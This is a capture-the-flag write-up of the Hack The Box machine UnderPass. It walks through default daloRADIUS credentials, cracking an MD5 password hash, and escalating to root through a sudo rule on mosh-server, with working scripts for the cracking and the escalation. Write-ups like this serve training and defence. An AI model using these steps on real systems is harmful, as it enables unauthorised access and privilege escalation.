Hackthebox: UnderPass

Foued SAIDI

Overview

UnderPass is an easy-difficulty Linux machine from Hack The Box. Enumeration turns up an exposed daloRADIUS instance whose operator portal still accepts the default credentials; from the administrative interface we read the RADIUS user list, recover the unsalted MD5 password hash of the svcMosh account, crack it and log in over SSH for the user flag. For root, svcMosh is allowed to run mosh-server through sudo without a password, so we start a root-owned mosh-server, take the session key it prints and attach to it with mosh-client.

UnderPass-info-card

Reconnaissance

PS C:\Users\foued> nmap -A -Pn 10.10.11.48 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 10:17 W. Central Africa Standard Time
Nmap scan report for 10.10.11.48
Host is up (0.47s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.77 seconds

Only two of the 1000 scanned ports answer: SSH on 22 (OpenSSH 8.9p1, Ubuntu) and Apache 2.4.52 on 80, which serves nothing but the default Ubuntu page. A default index with a real application behind it usually means the content lives in a subdirectory, so the next step is directory brute forcing.

Directory bruteforcing

PS C:\Users\foued\Desktop\Tools\SecLists-master> feroxbuster -u http://10.10.11.48 -w .\Discovery\Web-Content\common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.8.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.48
 🚀  Threads               │ 50
 📖  Wordlist              │ .\Discovery\Web-Content\common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.8.0
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD - - - - http://10.10.11.48 => auto-filtering 404-like response (9 lines); toggle this behavior by using --dont-filter
200 GET 363l 961w 10671c http://10.10.11.48/
200 GET 12l 11w 221c http://10.10.11.48/daloradius/.gitignore
200 GET 412l 3898w 24703c http://10.10.11.48/daloradius/ChangeLog
200 GET 340l 2968w 18011c http://10.10.11.48/daloradius/LICENSE
200 GET 363l 961w 10671c http://10.10.11.48/index.html
[###########>--------] - 3m 29495/52217 2m found:5 errors:4581
[####################] - 1m 4751/4747 50/s http://10.10.11.48/
[####################] - 2m 4751/4747 34/s http://10.10.11.48/daloradius/
[##################>-] - 2m 4479/4747 28/s http://10.10.11.48/daloradius/app/
[#############>------] - 2m 3247/4747 21/s http://10.10.11.48/daloradius/contrib/
[###############>----] - 2m 3629/4747 24/s http://10.10.11.48/daloradius/doc/
[############>-------] - 2m 3023/4747 22/s http://10.10.11.48/daloradius/app/common/
[#######>------------] - 2m 1668/4747 13/s http://10.10.11.48/daloradius/library/
[########>-----------] - 1m 2020/4747 19/s http://10.10.11.48/daloradius/contrib/db/
[##>-----------------] - 1m 639/4747 7/s http://10.10.11.48/daloradius/setup/
[#####>--------------] - 1m 1278/4747 16/s http://10.10.11.48/daloradius/doc/install/
[--------------------] - 0s 0/4747 0/s http://10.10.11.48/daloradius/app/users/

Daloradius Web Application - http://10.10.11.48/daloradius/app/operators

feroxbuster reveals a daloRADIUS deployment under /daloradius/. daloRADIUS is a web front end for managing FreeRADIUS (hotspot and ISP user management, billing and accounting). The readable .gitignore, ChangeLog and LICENSE files are an information leak in their own right, since the ChangeLog normally pins the exact release.
The application's source on GitHub shows the 2.x layout: app/users/ is the end-user self-service portal and app/operators/ is the administrative portal, which is the interesting endpoint here:

Daloradius instance

daloRADIUS ships with the default operator account administrator:radius. It has not been changed on this instance, so we log straight in:

Daloradius instance

From the operator menu, Management > Users lists every RADIUS account at http://10.10.11.48/daloradius/app/operators/mng-list-all.php:

Daloradius instance

The listing exposes the password attribute of the svcMosh user: 412DD4759978ACFCC81DEAB01B382403. Thirty-two hex characters in a RADIUS user table is consistent with an unsalted MD5 digest, the format FreeRADIUS uses for the MD5-Password check attribute, and an unsalted fast hash is cheap to reverse: a lookup on https://crackstation.net/ returns underwaterfriends (hashcat -m 0 with a wordlist containing the password would do the same offline). The RADIUS account doubles as a local one, so we SSH in as svcMosh and take the user flag:

svcMosh@underpass:~$ id
uid=1002(svcMosh) gid=1002(svcMosh) groups=1002(svcMosh)
svcMosh@underpass:~$ cat user.txt
bbfc40fc1389516f00b23bcb62c85872
svcMosh@underpass:~$
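Before handing a hash to an online lookup service, which also discloses it to a third party, it is worth classifying it and trying a local wordlist first. The script below is an added example and not part of the original write-up: it classifies a digest by length and character set, runs a small dictionary attack with md5sum, and tries the hash from the listing against a constructed three-word list (a real run would feed a wordlist file instead). The helper names are my own.

```bash
#!/usr/bin/env bash
# Added example (not from the write-up): classify a hash pulled from a
# daloRADIUS user listing and try a local dictionary against it before
# reaching for an online lookup service.
set -eu

# Classify by length and charset only. Length alone cannot tell MD5 from
# NTLM or MD4 (all 128-bit); the RADIUS context is what makes MD5 the first guess.
classify_hash() {
    local h="$1"
    case "$h" in
        *[!0-9A-Fa-f]*) echo "not-hex"; return 0 ;;
    esac
    case "${#h}" in
        32) echo "128-bit (MD5/NTLM/MD4)" ;;
        40) echo "160-bit (SHA-1)" ;;
        64) echo "256-bit (SHA-256)" ;;
        *)  echo "unknown" ;;
    esac
}

md5_hex() {
    # printf '%s' so the trailing newline is not hashed, a classic mismatch.
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Dictionary attack: print the matching candidate and return 0, else return 1.
# The comparison is case-insensitive because daloRADIUS shows the digest upper-cased.
crack_md5() {
    local target candidate
    target=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    shift
    for candidate in "$@"; do
        if [ "$(md5_hex "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done
    return 1
}

# Hash recovered from the page, tried against a constructed mini-wordlist.
# For a real attempt substitute e.g. $(cat /usr/share/wordlists/rockyou.txt).
HASH_FROM_PAGE="412DD4759978ACFCC81DEAB01B382403"
echo "type: $(classify_hash "$HASH_FROM_PAGE")"
if pw=$(crack_md5 "$HASH_FROM_PAGE" radius password underwaterfriends); then
    echo "svcMosh password: $pw"
else
    echo "no hit in the local list; fall back to hashcat -m 0 or a lookup service"
fi
```

The classification step matters because a 32-character hex string is not automatically MD5; if the RADIUS backend had stored NT-Password values the same string would need hashcat mode 1000 instead of 0.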

Privilege Escalation - Mosh server abuse

Next we check what svcMosh is allowed to run through sudo:

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server

svcMosh can run /usr/bin/mosh-server as root (ALL) without a password (NOPASSWD).

Because sudo launches mosh-server as root, the shell it spawns for a connecting client is root's. On start-up the server prints one line, MOSH CONNECT <port> <key>: the UDP port it listens on (the first free one in 60001-60999) and the base64 session key, which is the only thing authenticating the client. So we run it once with sudo, then from a second SSH session as svcMosh attach with MOSH_KEY=<mosh-key-value> mosh-client 127.0.0.1 <port>. The detached server gives up if no client connects within about a minute, so the second step has to follow promptly:
Step 1:

svcMosh@underpass:~$ sudo /usr/bin/mosh-server


MOSH CONNECT 60001 gb2KiBoIqYfjTKQs0Z4pxA

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <[email protected]>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 4397]
svcMosh@underpass:~$

Step 2:

root@underpass:~# id
uid=0(root) gid=0(root) groups=0(root)
root@underpass:~# cat /root/root.txt
95bfbcdd99b59de1bead0d706a1c6774
root@underpass:~#
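The two manual steps above can be driven from one script, which also removes the race against the server's connect timeout. The following is an added example and not part of the original write-up or of mosh itself: parse_mosh_connect pulls the port and key out of the server output, and escalate_via_mosh starts the root-owned server and attaches to it. The function names are my own; the mosh-server options used (new, -i, -p) and mosh-client's MOSH_KEY environment variable are documented mosh behaviour. The escalation only runs when the script is invoked with --run, so the parser can be exercised on any machine.

```bash
#!/usr/bin/env bash
# Added example, not from the write-up: the two manual steps driven from one
# script. Only escalate_via_mosh touches the target, and only under --run.
set -eu

# Extract "<port> <key>" from mosh-server's output. The server prints exactly
# one line of the form "MOSH CONNECT <udp-port> <base64-key>"; the banner and
# the "[mosh-server detached, pid = N]" line are noise for our purposes.
parse_mosh_connect() {
    local line
    line=$(printf '%s\n' "$1" | grep '^MOSH CONNECT ' | head -n 1)
    [ -n "$line" ] || return 1
    # shellcheck disable=SC2086  # word-splitting the line is intended here
    set -- $line
    [ "$#" -eq 4 ] || return 1
    printf '%s %s\n' "$3" "$4"
}

escalate_via_mosh() {
    local out conn port key
    # "new -p 60001" pins the UDP port instead of taking the first free one in
    # 60001-60999; "-i 127.0.0.1" keeps the listener off the external interface,
    # so the root shell is only reachable from the box itself.
    out=$(sudo /usr/bin/mosh-server new -i 127.0.0.1 -p 60001 2>&1)
    conn=$(parse_mosh_connect "$out") || {
        echo "mosh-server did not print a MOSH CONNECT line:" >&2
        printf '%s\n' "$out" >&2
        return 1
    }
    port=${conn%% *}
    key=${conn#* }
    # The server runs as root, so the shell it hands to the first client is
    # root's. mosh-client reads the key from MOSH_KEY and unsets it at start-up,
    # and the server exits if nobody connects within about a minute.
    MOSH_KEY="$key" exec mosh-client 127.0.0.1 "$port"
}

if [ "${1:-}" = "--run" ]; then
    escalate_via_mosh
fi
```

Run as svcMosh with ./mosh-root.sh --run and the root prompt appears in the same terminal. The defensive lesson is the same one the sudoers line teaches: granting NOPASSWD on any program that spawns an interactive shell, mosh-server included, is equivalent to granting a root shell.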

And that was it for UnderPass, hope you learned something new!
-0xkujen

  • Title: Hackthebox: UnderPass
  • Author: Foued SAIDI
  • Created at : 2025-05-10 17:10:21
  • Updated at : 2025-05-10 17:10:21
  • Link: https://kujen5.github.io/2025/05/10/Hackthebox-UnderPass/
  • License: This work is licensed under CC BY-NC-SA 4.0.